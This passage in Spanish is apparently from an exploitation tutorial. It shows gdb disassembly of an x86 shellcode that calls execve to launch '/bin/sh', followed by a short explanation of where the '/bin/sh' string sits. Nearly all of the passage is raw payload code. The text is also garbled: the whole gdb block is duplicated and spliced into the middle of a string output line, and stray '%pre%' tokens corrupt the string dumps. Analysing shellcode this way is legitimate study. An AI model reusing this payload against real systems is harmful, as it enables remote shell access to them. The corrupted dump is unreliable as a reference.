Si está interesado y sabe un poco de montaje, este es el aspecto del código de shell:
(gdb) x/s shellcode+61
0x804a07d <shellcode+61>: "2(gdb) x/s shellcode+61
0x804a07d <shellcode+61>: "2%pre%4%pre%4%pre%4%pre%4\a%pre%4"
(gdb) x/31i shellcode
0x804a040 <shellcode>: jmp 0x804a065 <shellcode+37>
0x804a042 <shellcode+2>: pop esi
0x804a043 <shellcode+3>: lea ebx,[esi]
0x804a045 <shellcode+5>: mov DWORD PTR [esi+0xb],ebx
0x804a048 <shellcode+8>: xor edx,edx
0x804a04a <shellcode+10>: mov DWORD PTR [esi+0x7],edx
0x804a04d <shellcode+13>: mov DWORD PTR [esi+0xf],edx
0x804a050 <shellcode+16>: mov DWORD PTR [esi+0x14],edx
0x804a053 <shellcode+19>: mov BYTE PTR [esi+0x19],dl
0x804a056 <shellcode+22>: xor eax,eax
0x804a058 <shellcode+24>: mov al,0x3b
0x804a05a <shellcode+26>: lea ecx,[esi+0xb]
0x804a05d <shellcode+29>: mov edx,ecx
0x804a05f <shellcode+31>: push edx
0x804a060 <shellcode+32>: push ecx
0x804a061 <shellcode+33>: push ebx
0x804a062 <shellcode+34>: push eax
0x804a063 <shellcode+35>: jmp 0x804a07d <shellcode+61>
0x804a065 <shellcode+37>: call 0x804a042 <shellcode+2>
0x804a06a <shellcode+42>: das
0x804a06b <shellcode+43>: bound ebp,QWORD PTR [ecx+0x6e]
0x804a06e <shellcode+46>: das
0x804a06f <shellcode+47>: jae 0x804a0d9
0x804a071 <shellcode+49>: add DWORD PTR [ecx],eax
0x804a073 <shellcode+51>: add DWORD PTR [ecx],eax
0x804a075 <shellcode+53>: add al,BYTE PTR [edx]
0x804a077 <shellcode+55>: add al,BYTE PTR [edx]
0x804a079 <shellcode+57>: add eax,DWORD PTR [ebx]
0x804a07b <shellcode+59>: add eax,DWORD PTR [ebx]
0x804a07d <shellcode+61>: call 0x407:0x4040404
0x804a084 <shellcode+68>: add BYTE PTR [eax],al
(gdb) x/s shellcode+42
0x804a06a <shellcode+42>: "/bin/sh%pre%1%pre%1%pre%1%pre%1%pre%2%pre%2%pre%2%pre%2%pre%3%pre%3%pre%3%pre%32%pre%4%pre%4%pre%4%pre%4\a%pre%4"
4%pre%4%pre%4%pre%4\a%pre%4"
(gdb) x/31i shellcode
0x804a040 <shellcode>: jmp 0x804a065 <shellcode+37>
0x804a042 <shellcode+2>: pop esi
0x804a043 <shellcode+3>: lea ebx,[esi]
0x804a045 <shellcode+5>: mov DWORD PTR [esi+0xb],ebx
0x804a048 <shellcode+8>: xor edx,edx
0x804a04a <shellcode+10>: mov DWORD PTR [esi+0x7],edx
0x804a04d <shellcode+13>: mov DWORD PTR [esi+0xf],edx
0x804a050 <shellcode+16>: mov DWORD PTR [esi+0x14],edx
0x804a053 <shellcode+19>: mov BYTE PTR [esi+0x19],dl
0x804a056 <shellcode+22>: xor eax,eax
0x804a058 <shellcode+24>: mov al,0x3b
0x804a05a <shellcode+26>: lea ecx,[esi+0xb]
0x804a05d <shellcode+29>: mov edx,ecx
0x804a05f <shellcode+31>: push edx
0x804a060 <shellcode+32>: push ecx
0x804a061 <shellcode+33>: push ebx
0x804a062 <shellcode+34>: push eax
0x804a063 <shellcode+35>: jmp 0x804a07d <shellcode+61>
0x804a065 <shellcode+37>: call 0x804a042 <shellcode+2>
0x804a06a <shellcode+42>: das
0x804a06b <shellcode+43>: bound ebp,QWORD PTR [ecx+0x6e]
0x804a06e <shellcode+46>: das
0x804a06f <shellcode+47>: jae 0x804a0d9
0x804a071 <shellcode+49>: add DWORD PTR [ecx],eax
0x804a073 <shellcode+51>: add DWORD PTR [ecx],eax
0x804a075 <shellcode+53>: add al,BYTE PTR [edx]
0x804a077 <shellcode+55>: add al,BYTE PTR [edx]
0x804a079 <shellcode+57>: add eax,DWORD PTR [ebx]
0x804a07b <shellcode+59>: add eax,DWORD PTR [ebx]
0x804a07d <shellcode+61>: call 0x407:0x4040404
0x804a084 <shellcode+68>: add BYTE PTR [eax],al
(gdb) x/s shellcode+42
0x804a06a <shellcode+42>: "/bin/sh%pre%1%pre%1%pre%1%pre%1%pre%2%pre%2%pre%2%pre%2%pre%3%pre%3%pre%3%pre%32%pre%4%pre%4%pre%4%pre%4\a%pre%4"
La cadena "/ bin / sh" está en shellcode + 42 y es la cadena que se ejecutará en el sistema y le traerá una shell (aquí el significado de shell-code). A propósito, el desensamblaje de instrucciones de shellcode + 42 hasta 7 bytes más parece "código extraño", esto se debe a que el desensamblador administra la cadena como si fuera un código en lugar de datos.